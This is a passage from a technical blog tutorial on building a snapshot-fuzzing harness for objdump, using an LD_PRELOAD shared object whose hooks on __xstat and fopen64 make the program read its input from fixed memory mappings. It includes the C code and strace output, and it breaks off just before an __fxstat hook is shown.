    However, with binary targets for which we don’t have source code, it’s sometimes hard to discern what global state we’re affecting while executing any code path without some heavy reverse engineering (disgusting, work? gross). Additionally, we often want to fuzz a wider loop. It doesn’t do us much good to fuzz a function which returns a struct that is then never read or consumed in our fuzzing workflow. With these things in mind, we often find that ‘snapshot’ fuzzing would be a more robust workflow for binary targets, or even production binaries for which, we have source, but have gone through the sausage factory of enterprise build systems.

    So today, we’re going to learn how to take an arbitrary binary only target that takes an input file from the user and turn it into a target that takes its input from memory instead and lends itself well to having its state reset between fuzzcases.

    Target (Easy Mode)

    For the purposes of this blogpost, we’re going to harness objdump to be snapshot fuzzed. This will serve our purposes because it’s relatively simple (single threaded, single process) and it’s a common fuzzing target, especially as people do development work on their fuzzers. The point of this is not to impress you by sandboxing some insane target like Chrome, but to show beginners how to start thinking about harnessing. You want to lobotomize your targets so that they are unrecognizable to their original selves but retain the same semantics. You can get as creative as you want, and honestly, sometimes harnessing targets is some of the most satisfying work related to fuzzing. It feels great to successfully sandbox a target and have it play nice with your fuzzer. On to it then.

    Hello World

    The first step is to determine how we want to change objdump’s behavior. Let’s try running it under strace and disassemble ls and see how it behaves at the syscall level with strace objdump -D /bin/ls. What we’re looking for is the point where objdump starts interacting with our input, /bin/ls in this case. In the output, if you scroll down past the boilerplate stuff, you can see the first appearance of /bin/ls:

    stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
    stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
    openat(AT_FDCWD, "/bin/ls", O_RDONLY)   = 3
    fcntl(3, F_GETFD)                       = 0
    fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
    

    Keep in mind that as you read through this, if you’re following along at home, your output might not match mine exactly. I’m likely on a different distribution than you running a different objdump than you. But the point of the blogpost is to just show concepts that you can be creative on your own.

    I also noticed that the program doesn’t close our input file until the end of execution:

    read(3, "\0\0\0\0\0\0\0\0\10\0\"\0\0\0\0\0\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0"..., 4096) = 2720
    write(1, ":(%rax)\n  21ffa4:\t00 00         "..., 4096) = 4096
    write(1, "x0,%eax\n  220105:\t00 00         "..., 4096) = 4096
    close(3)                                = 0
    write(1, "023e:\t00 00                \tadd "..., 2190) = 2190
    exit_group(0)                           = ?
    +++ exited with 0 +++
    

    This is good to know, we’ll need our harness to be able to emulate an input file fairly well since objdump doesn’t just read our file into a memory buffer in one shot or mmap() the input file. It is continuously reading from the file throughout the strace output.

    Since we don’t have source code for the target, we’re going to affect behavior by using an LD_PRELOAD shared object. By using an LD_PRELOAD shared object, we should be able to hook the wrapper functions around the syscalls that interact with our input file and change their behavior to suit our purposes. If you are unfamiliar with dynamic linking or LD_PRELOAD, this would be a good stopping point to go Google around for more information great starting point. For starters, let’s just get a Hello, World! shared object loaded.

    We can utilize gcc Function Attributes to have our shared object execute code when it is loaded by the target by leveraging the constructor attribute.

    So our code so far will look like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #include <stdio.h> /* printf */
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        printf("** LD_PRELOAD shared object loaded!\n");
    }
    

    I added the compiler flags needed to compile to the top of the file as a comment. I got these flags from this blogpost on using LD_PRELOAD shared objects a while ago: https://tbrindus.ca/correct-ld-preload-hooking-libc/.

    We can now use the LD_PRELOAD environment variable and run objdump with our shared object which should print when loaded:

    [email protected]:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D /bin/ls > /tmp/output.txt && head -n 20 /tmp/output.txt
    **> LD_PRELOAD shared object loaded!
    
    /bin/ls:     file format elf64-x86-64
    
    
    Disassembly of section .interp:
    
    0000000000000238 <.interp>:
     238:   2f                      (bad)  
     239:   6c                      ins    BYTE PTR es:[rdi],dx
     23a:   69 62 36 34 2f 6c 64    imul   esp,DWORD PTR [rdx+0x36],0x646c2f34
     241:   2d 6c 69 6e 75          sub    eax,0x756e696c
     246:   78 2d                   js     275 <[email protected]@Base-0x34e3>
     248:   78 38                   js     282 <[email protected]@Base-0x34d6>
     24a:   36 2d 36 34 2e 73       ss sub eax,0x732e3436
     250:   6f                      outs   dx,DWORD PTR ds:[rsi]
     251:   2e 32 00                xor    al,BYTE PTR cs:[rax]
    
    Disassembly of section .note.ABI-tag:
    

    It works, now we can start looking for functions to hook.

    Looking for Hooks

    First thing we need to do, is create a fake file name to give objdump so that we can start testing things out. We will copy /bin/ls into the current working directory and call it fuzzme. This will allow us to generically play around with the harness for testing purposes. Now we have our strace output, we know that objdump calls stat() on the path for our input file (/bin/ls) a couple of times before we get that call to openat(). Since we know our file hasn’t been opened yet, and the syscall uses the path for the first arg, we can guess that this syscall results from the libc exported wrapper function for stat() or lstat(). I’m going to assume stat() since we aren’t dealing with any symbolic links for /bin/ls on my box. We can add a hook for stat() to test to see if we hit it and check if it’s being called for our target input file (now changed to fuzzme).

    In order to create a hook, we will follow a pattern where we define a pointer to the real function via a typedef and then we will initialize the pointer as NULL. Once we need to resolve the location of the real function we are hooking, we can use dlsym(RLTD_NEXT, <symbol name>) to get it’s location and change the pointer value to the real symbol address. (This will be more clear later on).

    Now we need to hook stat() which appears as a man 3 entry here (meaning it’s a libc exported function) as well as a man 2 entry (meaning it is a syscall). This was confusing to me for the longest time and I often misunderstood how syscalls actually worked because of this insistence on naming collisions. You can read one of the first research blogposts I ever did here where the confusion is palpable and I often make erroneous claims. (PS, I’ll never edit the old blogposts with errors in them, they are like time capsules, and it’s kind of cool to me).

    We want to write a function that when called, simply prints something and exits so that we know our hook was hit. For now, our code looks like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET "fuzzme"
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*stat_t)(const char *restrict path, struct stat *restrict buf);
    stat_t real_stat = NULL;
    
    // Hook function, objdump will call this stat instead of the real one
    int stat(const char *restrict path, struct stat *restrict buf) {
        printf("** stat() hook!\n");
        exit(0);
    }
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        printf("** LD_PRELOAD shared object loaded!\n");
    }
    

    However, if we compile and run that, we don’t ever print and exit so our hook is not being called. Something is going wrong. Sometimes, file related functions in libc have 64 variants, such as open() and open64() that are used somewhat interchangably depending on configurations and flags. I tried hooking a stat64() but still had no luck with the hook being reached.

    Luckily, I’m not the first person with this problem, there is a great answer on Stackoverflow about the very issue that describes how libc doesn’t actually export stat() the same way it does for other functions like open() and open64(), instead it exports a symbol called __xstat() which has a slightly different signature and requires a new argument called version which is meant to describe which version of stat struct the caller is expecting. This is supposed to all happen magically under the hood but that’s where we live now, so we have to make the magic happen ourselves. The same rules apply for lstat() and fstat() as well, they have __lxstat() and __fxstat() respectively.

    I found the definitions for the functions here. So we can add the __xstat() hook to our shared object in place of the stat() and see if our luck changes. Our code now looks like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET "fuzzme"
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Hook function, objdump will call this stat instead of the real one
    int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
        printf("** Hit our __xstat() hook!\n");
        exit(0);
    }
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        printf("** LD_PRELOAD shared object loaded!\n");
    }
    

    Now if we run our shared object, we get the desired outcome, somewhere, our hook is hit. Now we can help ourselves out a bit and print the filenames being requested by the hook and then actually call the real __xstat() on behalf of the caller. Now when our hook is hit, we will have to resolve the location of the real __xstat() by name, so we’ll add a symbol resolving function to our shared object. Our shared object code now looks like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #define _GNU_SOURCE     /* dlsym */
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    #include <dlfcn.h> /* dlsym and friends */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET "fuzzme"
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Returns memory address of *next* location of symbol in library search order
    static void *_resolve_symbol(const char *symbol) {
        // Clear previous errors
        dlerror();
    
        // Get symbol address
        void* addr = dlsym(RTLD_NEXT, symbol);
    
        // Check for error
        char* err = NULL;
        err = dlerror();
        if (err) {
            addr = NULL;
            printf("Err resolving '%s' addr: %s\n", symbol, err);
            exit(-1);
        }
        
        return addr;
    }
    
    // Hook function, objdump will call this stat instead of the real one
    int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
        // Print the filename requested
        printf("** __xstat() hook called for filename: '%s'\n", __filename);
    
        // Resolve the address of the real __xstat() on demand and only once
        if (!real_xstat) {
            real_xstat = _resolve_symbol("__xstat");
        }
    
        // Call the real __xstat() for the caller so everything keeps going
        return real_xstat(__ver, __filename, __stat_buf);
    }
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        printf("** LD_PRELOAD shared object loaded!\n");
    }
    

    Ok so now when we run this, and we check for our print statements, things get a little spicy.

    [email protected]:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt && grep "** __xstat" /tmp/output.txt
    ** __xstat() hook called for filename: 'fuzzme'
    ** __xstat() hook called for filename: 'fuzzme'
    

    So now we can have some fun.

    __xstat() Hook

    So the purpose of this hook will be to lie to objdump and make it think it successfully stat() the input file. Remember, we’re making a snapshot fuzzing harness so our objective is to constantly be creating new inputs and feeding them to objdump through this harness. Most importantly, our harness will need to be able to represent our variable length inputs (which will be stored purely in memory) as files. Each fuzzcase, the file length can change and our harness needs to accomodate that.

    My idea at this point was to create a somewhat “legit” stat struct that would normally be returned for our actual file fuzzme which is just a copy of /bin/ls. We can store this stat struct globally and only update the size field as each new fuzz case comes through. So the timeline of our snapshot fuzzing workflow would look something like:

    1. Our constructor function is called when our shared object is loaded
    2. Our constructor sets up a global “legit” stat struct that we can update for each fuzzcase and pass back to callers of __xstat() trying to stat() our fuzzing target
    3. The imaginary fuzzer runs objdump to the snapshot location
    4. Our __xstat() hook updates the the global “legit” stat struct size field and copies the stat struct into the caller’s buffer
    5. The imaginary fuzzer restores the state of objdump to its state at snapshot time
    6. The imaginary fuzzer copies a new input into harness and updates the input size
    7. Our __xstat() hook is called once again, and we repeat step 4, this process occurs over and over forever.

    So we’re imagining the fuzzer has some routine like this in pseudocode, even though it’d likely be cross-process and require process_vm_writev:

    insert_fuzzcase(config.input_location, config.input_size_location, input, input_size) {
      memcpy(config.input_location, &input, input_size);
      memcpy(config.input_size_location, &input_size, sizeof(size_t));
    }
    

    One important thing to keep in mind is that if the snapshot fuzzer is restoring objdump to its snapshot state every fuzzing iteration, we must be careful not to depend on any global mutable memory. The global stat struct will be safe since it will be instantiated during the constructor however, its size-field will be restored to its original value each fuzzing iteration by the fuzzer’s snapshot restore routine.

    We will also need a global, recognizable address to store variable mutable global data like the current input’s size. Several snapshot fuzzers have the flexibility to ignore contiguous ranges of memory for restoration purposes. So if we’re able to create some contiguous buffers in memory at recognizable addresses, we can have our imaginary fuzzer ignore those ranges for snapshot restorations. So we need to have a place to store the inputs, as well as information about their size. We would then somehow tell the fuzzer about these locations and when it generated a new input, it would copy it into the input location and then update the current input size information.

    So now our constructor has an additional job: setup the input location as well as the input size information. We can do this easily with a call to mmap() which will allow us to specify an address we want our mapping mapped to with the MAP_FIXED flag. We’ll also create a MAX_INPUT_SZ definition so that we know how much memory to map from the input location.

    Just by themselves, the functions related to mapping memory space for the inputs themselves and their size information looks like this. Notice that we use MAP_FIXED and we check the returned address from mmap() just to make sure the call didn’t succeed but map our memory at a different location:

    // Map memory to hold our inputs in memory and information about their size
    static void _create_mem_mappings(void) {
        void *result = NULL;
    
        // Map the page to hold the input size
        result = mmap(
            (void *)(INPUT_SZ_ADDR),
            sizeof(size_t),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
            printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Let's actually initialize the value at the input size location as well
        *(size_t *)INPUT_SZ_ADDR = 0;
    
        // Map the pages to hold the input contents
        result = mmap(
            (void *)(INPUT_ADDR),
            (size_t)(MAX_INPUT_SZ),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
            printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Init the value
        memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
    }
    

    mmap() will actually map multiples of whatever the page size is on your system (typically 4096 bytes). So, when we ask for sizeof(size_t) bytes for the mapping, mmap() is like: “Hmm, that’s just a page dude” and gives us back a whole page from 0x1336000 - 0x1337000 not inclusive on the high-end.

    Random sidenote, be careful about arithmetic in definitions and macros as I’ve done here with MAX_INPUT_SIZE, it’s very easy for the pre-processor to substitute your text for the definition keyword and ruin some order of operations or even overflow a specific primitive type like int.

    Now that we have memory set up for the fuzzer to store inputs and information about the input’s size, we can create that global stat struct. But we actually have a big problem. How can we call into __xstat() to get our “legit” stat struct if we have __xstat() hooked? We would hit our own hook. To circumvent this, we can call __xstat() with a special __ver argument that we know will mean that it was called from our constructor, the variable is an int so let’s go with 0x1337 as the special value. That way, in our hook, if we check __ver and it’s 0x1337, we know we are being called from the constructor and we can actually stat our real file and create a global “legit” stat struct. When I dumped a normal call by objdump to __xstat() the __version was always a value of 1 so we will patch it back to that inside our hook. Now our entire shared object source file should look like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #define _GNU_SOURCE     /* dlsym */
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    #include <dlfcn.h> /* dlsym and friends */
    #include <sys/mman.h> /* mmap */
    #include <string.h> /* memset */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET "fuzzme"
    
    // Definitions for our in-memory inputs 
    #define INPUT_SZ_ADDR   0x1336000
    #define INPUT_ADDR      0x1337000
    #define MAX_INPUT_SZ    (1024 * 1024)
    
    // Our "legit" global stat struct
    struct stat st;
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Returns memory address of *next* location of symbol in library search order
    static void *_resolve_symbol(const char *symbol) {
        // Clear previous errors
        dlerror();
    
        // Get symbol address
        void* addr = dlsym(RTLD_NEXT, symbol);
    
        // Check for error
        char* err = NULL;
        err = dlerror();
        if (err) {
            addr = NULL;
            printf("Err resolving '%s' addr: %s\n", symbol, err);
            exit(-1);
        }
        
        return addr;
    }
    
    // Hook for __xstat 
    int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
        // Resolve the real __xstat() on demand and maybe multiple times!
        if (NULL == real_xstat) {
            real_xstat = _resolve_symbol("__xstat");
        }
    
        // Assume the worst, always
        int ret = -1;
    
        // Special __ver value check to see if we're calling from constructor
        if (0x1337 == __ver) {
            // Patch back up the version value before sending to real xstat
            __ver = 1;
    
            ret = real_xstat(__ver, __filename, __stat_buf);
    
            // Set the real_xstat back to NULL
            real_xstat = NULL;
            return ret;
        }
    
        // Determine if we're stat'ing our fuzzing target
        if (!strcmp(__filename, FUZZ_TARGET)) {
            // Update our global stat struct
            st.st_size = *(size_t *)INPUT_SZ_ADDR;
    
            // Send it back to the caller, skip syscall
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Just a normal stat, send to real xstat
        else {
            ret = real_xstat(__ver, __filename, __stat_buf);
        }
    
        return ret;
    }
    
    // Map memory to hold our inputs in memory and information about their size
    static void _create_mem_mappings(void) {
        void *result = NULL;
    
        // Map the page to hold the input size
        result = mmap(
            (void *)(INPUT_SZ_ADDR),
            sizeof(size_t),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
            printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Let's actually initialize the value at the input size location as well
        *(size_t *)INPUT_SZ_ADDR = 0;
    
        // Map the pages to hold the input contents
        result = mmap(
            (void *)(INPUT_ADDR),
            (size_t)(MAX_INPUT_SZ),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
            printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Init the value
        memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
    }
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        // Create memory mappings to hold our input and information about its size
        _create_mem_mappings();    
    }
    

    Now if we run this, we get the following output:

    [email protected]:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
    objdump: Warning: 'fuzzme' is not an ordinary file
    

    This is cool, this means that the objdump devs did something right and their stat() would say: “Hey, this file is zero bytes in length, something weird is going on” and they spit out this error message and exit. Good job devs!

    So we have identified a problem, we need to simulate the fuzzer placing a real input into memory, to do that, I’m going to start using #ifdef to define whether or not we’re testing our shared object. So basically, if we compile the shared object and define TEST, our shared object will copy an “input” into memory to simulate how the fuzzer would behave during fuzzing and we can see if our harness is working appropriately. So if we define TEST, we will copy /bin/ed into memory, and we will update our global “legit” stat struct size member, and place the /bin/ed bytes into memory.

    You can compile the shared object now to perform the test as follows:

    gcc -D TEST -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ld
    

    We also need to set up our global “legit” stat struct, the code to do that should look as follows. Remember, we pass a fake __ver variable to let the __xstat() hook know that it’s us in the constructor routine, which allows the hook to behave well and give us the stat struct we need:

    // Create a "legit" stat struct globally to pass to callers
    static void _setup_stat_struct(void) {
        // Create a global stat struct for our file in case someone asks, this way
        // when someone calls stat() or fstat() on our target, we can just return the
        // slightly altered (new size) stat struct &skip the kernel, save syscalls
        int result = __xstat(0x1337, FUZZ_TARGET, &st);
        if (-1 == result) {
            printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
        }
    }
    

    All in all, our entire harness looks like this now:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #define _GNU_SOURCE     /* dlsym */
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    #include <dlfcn.h> /* dlsym and friends */
    #include <sys/mman.h> /* mmap */
    #include <string.h> /* memset */
    #include <fcntl.h> /* open */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET     "fuzzme"
    
    // Definitions for our in-memory inputs 
    #define INPUT_SZ_ADDR   0x1336000
    #define INPUT_ADDR      0x1337000
    #define MAX_INPUT_SZ    (1024 * 1024)
    
    // For testing purposes, we read /bin/ed into our input buffer to simulate
    // what the fuzzer would do
    #define  TEST_FILE      "/bin/ed"
    
    // Our "legit" global stat struct
    struct stat st;
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Returns memory address of *next* location of symbol in library search order
    static void *_resolve_symbol(const char *symbol) {
        // Clear previous errors
        dlerror();
    
        // Get symbol address
        void* addr = dlsym(RTLD_NEXT, symbol);
    
        // Check for error
        char* err = NULL;
        err = dlerror();
        if (err) {
            addr = NULL;
            printf("Err resolving '%s' addr: %s\n", symbol, err);
            exit(-1);
        }
        
        return addr;
    }
    
    // Hook for __xstat 
    int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
        // Resolve the real __xstat() on demand and maybe multiple times!
        if (!real_xstat) {
            real_xstat = _resolve_symbol("__xstat");
        }
    
        // Assume the worst, always
        int ret = -1;
    
        // Special __ver value check to see if we're calling from constructor
        if (0x1337 == __ver) {
            // Patch back up the version value before sending to real xstat
            __ver = 1;
    
            ret = real_xstat(__ver, __filename, __stat_buf);
    
            // Set the real_xstat back to NULL
            real_xstat = NULL;
            return ret;
        }
    
        // Determine if we're stat'ing our fuzzing target
        if (!strcmp(__filename, FUZZ_TARGET)) {
            // Update our global stat struct
            st.st_size = *(size_t *)INPUT_SZ_ADDR;
    
            // Send it back to the caller, skip syscall
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Just a normal stat, send to real xstat
        else {
            ret = real_xstat(__ver, __filename, __stat_buf);
        }
    
        return ret;
    }
    
    // Map memory to hold our inputs in memory and information about their size
    static void _create_mem_mappings(void) {
        void *result = NULL;
    
        // Map the page to hold the input size
        result = mmap(
            (void *)(INPUT_SZ_ADDR),
            sizeof(size_t),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
            printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Let's actually initialize the value at the input size location as well
        *(size_t *)INPUT_SZ_ADDR = 0;
    
        // Map the pages to hold the input contents
        result = mmap(
            (void *)(INPUT_ADDR),
            (size_t)(MAX_INPUT_SZ),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
            printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Init the value
        memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
    }
    
    // Create a "legit" stat struct globally to pass to callers
    static void _setup_stat_struct(void) {
        int result = __xstat(0x1337, FUZZ_TARGET, &st);
        if (-1 == result) {
            printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
        }
    }
    
    // Used for testing, load /bin/ed into the input buffer and update its size info
    #ifdef TEST
    static void _test_func(void) {    
        // Open TEST_FILE for reading
        int fd = open(TEST_FILE, O_RDONLY);
        if (-1 == fd) {
            printf("Failed to open '%s' during test\n", TEST_FILE);
            exit(-1);
        }
    
        // Attempt to read max input buf size
        ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
        close(fd);
    
        // Update the input size
        *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;
    }
    #endif
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        // Create memory mappings to hold our input and information about its size
        _create_mem_mappings();
    
        // Setup global "legit" stat struct
        _setup_stat_struct();
    
        // If we're testing, load /bin/ed up into our input buffer and update size
    #ifdef TEST
        _test_func();
    #endif
    }
    

    Now if we run this under strace, we notice that our two stat() calls are conspicuously missing.

    close(3)                                = 0
    openat(AT_FDCWD, "fuzzme", O_RDONLY)    = 3
    fcntl(3, F_GETFD)                       = 0
    fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
    

    We no longer see the stat() calls before the openat() and the program does not break in any significant way. So this hook seems to be working appropriately. We now need to handle the openat() and make sure we don’t actually interact with our input file, but instead trick objdump to interact with our input in memory.

    Finding a Way to Hook openat()

    My non-expert intuition tells me theres probably a few ways in which a libc function could end up calling openat() under the hood. Those ways might include the wrappers open() as well as fopen(). We also need to be mindful of their 64 variants as well (open64(), fopen64()). I decided to try the fopen() hooks first:

    // Declare prototype for the real fopen and its friend fopen64 
    typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
    fopen_t real_fopen = NULL;
    
    typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
    fopen64_t real_fopen64 = NULL;
    
    ...
    
    // Exploratory hooks to see if we're using fopen() related functions to open
    // our input file
    FILE* fopen(const char* pathname, const char* mode) {
        printf("** fopen() called for '%s'\n", pathname);
        exit(0);
    }
    
    FILE* fopen64(const char* pathname, const char* mode) {
        printf("** fopen64() called for '%s'\n", pathname);
        exit(0);
    }
    

    If we compile and run our exploratory hooks, we get the following output:

    [email protected]:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
    ** fopen64() called for 'fuzzme'
    

    Bingo, dino DNA.

    So now we can flesh that hooked function out a bit to behave how we want.

    Refining an fopen64() Hook

    The definition for fopen64() is: ` FILE *fopen(const char *restrict pathname, const char *restrict mode);. The returned FILE * poses a slight problem to us because this is an opaque data structure that is not meant to be understood by the caller. Which is to say, the caller is not meant to access any members of this data structure or worry about its layout in any way. You're just supposed to use the returned FILE * as an object to pass to other functions, such as fclose()`. The system deals with the data structure there in those types of related functions so that programmers don’t have to worry about a specific implementation.

    We don’t actually know how the returned FILE * will be used, it may not be used at all, or it may be passed to a function such as fread() so we need a way to return a convincing FILE * data structure to the caller that is actually built from our input in memory and NOT from the input file. Luckily, there is a libc function called fmemopen() which behaves very similarly to fopen() and also returns a FILE *. So we can go ahead and create a FILE * to return to callers of fopen64() with fuzzme as the target input file. Shoutout to @domenuk for showing me fmemopen(), I had never come across it before.

    There is one key difference though. fopen() will actually obtain file descriptor for the underlying file and fmemopen(), since it is not actually openining a file, will not. So somewhere in the FILE * data structure, there is a file descriptor for the underlying file if returned from fopen() and there isn’t one if returned from fmemopen(). This is very important as functions such as int fileno(FILE *stream) can parse a FILE * and return its underlying file descriptor to the caller. Objdump may want to do this for some reason and we need to be able to robustly handle it. So we need a way to know if someone is trying to use our faked FILE * underlying file descriptor.

    My idea for this was to simply find the struct member containing the file descriptor in the FILE * returned from fmemopen() and change it to be something ridiculous like 1337 so that if objdump ever tried to use that file descriptor we would know the source of it and could try to hook any interactions with the file descriptor. So now our fopen64() hook should look as follows:

    // Our fopen hook, return a FILE* to the caller, also, if we are opening our
    // target make sure we're not able to write to the file
    FILE* fopen64(const char* pathname, const char* mode) {
        // Resolve symbol on demand and only once
        if (NULL == real_fopen64) {
            real_fopen64 = _resolve_symbol("fopen64");
        }
    
        // Check to see what file we're opening
        FILE* ret = NULL;
        if (!strcmp(FUZZ_TARGET, pathname)) {
            // We're trying to open our file, make sure it's a read-only mode
            if (strcmp(mode, "r")) {
                printf("Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
                exit(-1);
            }
    
            // Open shared memory FILE* and return to caller
            ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
            
            // Make sure we've never fopen()'d our fuzzing target before
            if (faked_fp) {
                printf("Attempting to fopen64() fuzzing target more than once\n");
                exit(-1);
            }
    
            // Update faked_fp
            faked_fp = ret;
    
            // Change the filedes to something we know
            ret->_fileno = 1337;
        }
    
        // We're not opening our file, send to regular fopen
        else {
            ret = real_fopen64(pathname, mode);
        }
    
        // Return FILE stream ptr to caller
        return ret;
    }
    

    You can see we:

    1. Resolve the symbol location if it hasn’t been yet
    2. Check to see if we’re being called on our fuzzing target input file
    3. Call fmemopen() and open the memory buffer where our current input is in memory along with the input’s size

    You may also notice a few safety checks as well to make sure things don’t go unnoticed. We have a global variable that is FILE *faked_fp that we initialize to NULL which let’s us know if we’ve ever opened our input more than once (it wouldn’t be NULL anymore on subsequent attempts to open it).

    We also do a check on the mode argument to make sure we’re getting a read-only FILE * back. We don’t want objdump to alter our input or write to it in any way and if it tries to, we need to know about it.

    Running our shared object at this point nets us the following output:

    [email protected]:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
    objdump: fuzzme: Bad file descriptor
    

    My spidey-sense is telling me something tried to interact with a file descriptor of 1337. Let’s run again under strace and see what happens.

    [email protected]:~/blogpost$ strace -E LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt
    

    In the output, we can see some syscalls to fcntl() and fstat() both being called with a file descriptor of 1337 which obviously doesn’t exist in our objdump process, so we’ve been able to find the problem.

    fcntl(1337, F_GETFD)                    = -1 EBADF (Bad file descriptor)
    prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
    fstat(1337, 0x7fff4bf54c90)             = -1 EBADF (Bad file descriptor)
    fstat(1337, 0x7fff4bf54bf0)             = -1 EBADF (Bad file descriptor)
    

    As we’ve already learned, there is no direct export in libc for fstat(), it’s one of those weird ones like stat() and we actually have to hook __fxstat(). So let’s try and hook that to see if it gets called for our 1337 file descriptor. The hook function will look like this to start:

